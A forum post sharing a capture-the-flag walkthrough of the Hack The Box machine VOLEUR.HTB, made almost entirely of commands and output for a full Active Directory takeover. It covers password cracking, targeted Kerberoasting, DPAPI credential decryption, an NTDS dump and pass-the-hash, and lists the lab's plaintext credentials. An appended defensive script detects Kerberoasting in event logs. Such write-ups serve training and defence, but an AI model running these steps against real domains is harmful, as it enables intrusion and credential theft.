07-07-25, 09:17 PM
TARGET: VOLEUR.HTB
I can provide my personal notes for the machine if anyone is interested.

Code:
IP: 10.10.11.76
Domain: voleur.htb
DC: dc.voleur.htb

Krb5.conf
Code:
[libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false

[realms]
    VOLEUR.HTB = {
        kdc = dc.voleur.htb
    }

[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB

Initial TGT generation - ryan.naylor
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/ryan.naylor:HollowOct31Nyt'
export KRB5CCNAME=ryan.naylor.ccache

SMB enumeration
Code:
netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir ""
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir "First-Line Support"

Download encrypted Excel file
Code:
netexec smb DC.VOLEUR.HTB --use-kcache --get-file "First-Line Support/Access_Review.xlsx" "./Access_Review.xlsx" --share IT

Crack Excel password
Code:
office2john Access_Review.xlsx > xlsx.h
john xlsx.h --wordlist=/usr/share/wordlists/rockyou.txt

Result:
Code:
football1

Decrypt and extract credentials
Code:
msoffcrypto-tool -p "football1" Access_Review.xlsx decrypted.xlsx
xlsx2csv decrypted.xlsx | sed -n '5p;12p;13p'

Extracted credentials:
Code:
Todd.Wolfe - Password was reset to NightT1meP1dg3on14 and account deleted
svc_ldap - P/W - M1XyC9pW7qT5Vn
svc_iis - P/W - N5pXyW1VqM7CZ8

Targeted Kerberoasting
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_ldap:M1XyC9pW7qT5Vn'
export KRB5CCNAME=svc_ldap.ccache
targetedKerberoast.py -v --dc-ip 10.10.11.76 --dc-host dc.VOLEUR.HTB -d "voleur.htb" -u "svc_ldap" -k --request-user svc_winrm -o kerberostable.txt

Extracted TGS hash:
Code:
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$cf6535bc0a95a2ed7b815852807efa4a$...

Crack TGS hash
Code:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs kerberostable.txt

Result:
Code:
svc_winrm:AFireInsidedeOzarctica980219afi

WinRM access
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi'
export KRB5CCNAME=FILE:svc_winrm.ccache
evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB

Restore deleted user Todd.Wolfe
Code:
$cred = [PSCredential]::new("svc_ldap@voleur.htb", (ConvertTo-SecureString "M1XyC9pW7qT5Vn" -AsPlainText -Force))
Import-Module ActiveDirectory
Get-ADObject -Filter {sAMAccountName -eq "todd.wolfe"} -IncludeDeletedObjects -Credential $cred | Restore-ADObject -Credential $cred
Get-ADUser todd.wolfe

Access Todd.Wolfe SMB share
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/todd.wolfe:NightT1meP1dg3on14'
KRB5CCNAME=todd.wolfe.ccache smbclient.py -k -no-pass VOLEUR.HTB/todd.wolfe@dc.voleur.htb
use IT
cd Second-Line Support
cd Archived Users
cd todd.wolfe

DPAPI credential extraction
Found DPAPI protected credentials in AppData/Roaming/Microsoft/

Extract masterkey:
Code:
dpapi.py masterkey -file "protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88" -sid "S-1-5-21-3927696377-1337352550-2781715495-1110" -password "NightT1meP1dg3on14"

Masterkey result:
Code:
0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Decrypt credentials:
Code:
dpapi.py credential -file "credentials/772275FAD58525253490A9B0039791D3" -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

DPAPI result:
Code:
Username: jeremy.combs
Password: qT3V9pLXyN7W4m

Jeremy.combs access
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/jeremy.combs:qT3V9pLXyN7W4m'
export KRB5CCNAME=FILE:jeremy.combs.ccache
evil-winrm -i dc.voleur.htb -k -u jeremy.combs -r VOLEUR.HTB (works but useless)
KRB5CCNAME=jeremy.combs.ccache smbclient.py -k -no-pass VOLEUR.HTB/jeremy.combs@dc.voleur.htb

SSH key discovery
Found in SMB share:

note.txt.txt:
Code:
Jeremy,
I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
Admin

id_rsa:
Code:
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----

SSH access to svc_backup via WSL
Code:
chmod 400 id_rsa
ssh -p 2222 -i id_rsa svc_backup@voleur.htb

AD database extraction
Found in /mnt/c/IT/THIRD-LINE SUPPORT/:
Code:
./Active Directory: ntds.dit ntds.jfm
./registry: SECURITY SYSTEM

Code:
secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL

Administrator hash:
Code:
administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::

Root access
Code:
getTGT.py -dc-ip 10.10.11.76 -hashes :e656e07c56d831611b577b160b259ad2 voleur.htb/administrator
export KRB5CCNAME=FILE:administrator.ccache
evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB

Credentials summary
Code:
ryan.naylor:HollowOct31Nyt (Initial access)
Todd.Wolfe:NightT1meP1dg3on14 (Restored account)
svc_ldap:M1XyC9pW7qT5Vn (Excel file)
svc_iis:N5pXyW1VqM7CZ8 (Excel file)
svc_winrm:AFireInsidedeOzarctica980219afi (Kerberoasted)
jeremy.combs:qT3V9pLXyN7W4m (DPAPI)
administrator:e656e07c56d831611b577b160b259ad2 (NTDS dump)
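The roasted ticket in the post carries etype 23 (the `$krb5tgs$23$` header, RC4-HMAC), which is exactly what a domain controller records in the Ticket Encryption Type field of Security event 4769. The following detection example is added here and is not part of the post or of any tool used in it: it runs over constructed 4769 records (field names assumed to match the Windows event schema) and flags user accounts that obtained RC4 service tickets for other user-style accounts, the pattern the targeted Kerberoast step above would produce.

```python
"""Flag Kerberoast-style requests in Windows Security event 4769 records.
Kerberoasting shows as a user account (not a computer) requesting a service
ticket for an SPN-bearing account with RC4-HMAC (etype 0x17, the 23 in the
$krb5tgs$23$ header of the cracked hash above)."""
from collections import defaultdict

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC and RC4-HMAC-EXP

def is_user_principal(name):
    """Computer accounts end in '$'; krbtgt requests are ordinary TGT traffic."""
    account = name.split("@")[0].lower()
    return not account.endswith("$") and account != "krbtgt"

def rc4_service_ticket_requests(events):
    """Successful 4769 records where a user account received an RC4 service
    ticket for another user-style (service) account."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
            continue
        if ev.get("TicketEncryptionType") not in RC4_ETYPES:
            continue
        if is_user_principal(ev["TargetUserName"]) and is_user_principal(ev["ServiceName"]):
            hits.append(ev)
    return hits

def roasted_services_by_requester(events, min_services=1):
    """Map each requester to the service accounts it got RC4 tickets for;
    min_services=1 keeps single-SPN cases such as a targeted Kerberoast."""
    seen = defaultdict(set)
    for ev in rc4_service_ticket_requests(events):
        seen[ev["TargetUserName"]].add(ev["ServiceName"])
    return {u: sorted(s) for u, s in seen.items() if len(s) >= min_services}

# Constructed sample records (not real telemetry), keyed by 4769 field names.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "svc_ldap@VOLEUR.HTB", "ServiceName": "svc_winrm",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "ryan.naylor@VOLEUR.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "Status": "0x0"},   # AES256, routine
    {"EventID": 4769, "TargetUserName": "DC$@VOLEUR.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "Status": "0x0"},   # machine TGT traffic
    {"EventID": 4769, "TargetUserName": "svc_ldap@VOLEUR.HTB", "ServiceName": "svc_iis",
     "TicketEncryptionType": "0x17", "Status": "0x1f"},  # failed, no ticket issued
]

if __name__ == "__main__":
    for user, services in roasted_services_by_requester(SAMPLE_EVENTS).items():
        print(f"ALERT: RC4 service tickets for {', '.join(services)} requested by {user}")
```

Raising `min_services` trades sensitivity for noise: it suppresses single-SPN targeted roasts like the one above but catches the more common mass-roast of every SPN account in the domain.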